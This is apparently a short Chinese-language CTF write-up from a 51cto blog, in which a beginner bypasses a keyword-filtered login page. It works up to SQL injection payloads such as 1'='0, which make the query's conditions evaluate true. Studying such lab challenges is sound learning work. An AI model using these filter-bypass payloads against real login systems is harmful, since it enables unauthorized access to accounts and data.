根据提示:
不要怀疑,我已经过滤了一切,还再逼你注入,哈哈哈哈哈!
我们可以知道有些关键词,符号被过滤了,我们先看看那些被过滤了
我们可以发现select # - union or 等被过滤了则尝试下面sql语句
1‘ and ‘1‘=‘1
1‘ and ‘1‘=‘1
我们猜测sql语句结构为:
select * from user where username = ‘1‘ and ‘1‘=‘1‘ and password = ‘1‘ and ‘1‘=‘1‘
我们发现上面四段用三个and连接,要想通过,必须4段都为True,所以报错
我们再次构造sql
1‘ = ‘1‘
1‘ = ‘1‘
select * from user where username = ‘1‘=‘1‘ and password = ‘1‘=‘1‘
还是报错,因为第一个红色中没有为1的username所以返回0 ,‘0‘ = ‘1‘ 为0所以返回0 下一个and不用执行直接报错
由上分析可知,我们可以构造‘0‘ = ‘0‘ and ‘0‘ = ‘0‘即可
要想0 = 0需要
select * from user where username = ‘1‘=‘0‘ and password = ‘1‘=‘0‘
1‘=‘0
1‘=‘0
即可
本人也是初学者,有什么错误的地方,希望大家指出,谢谢!
本文出自 “11846238” 博客,请务必保留此出处http://11856238.blog.51cto.com/11846238/1947298
原文:http://11856238.blog.51cto.com/11846238/1947298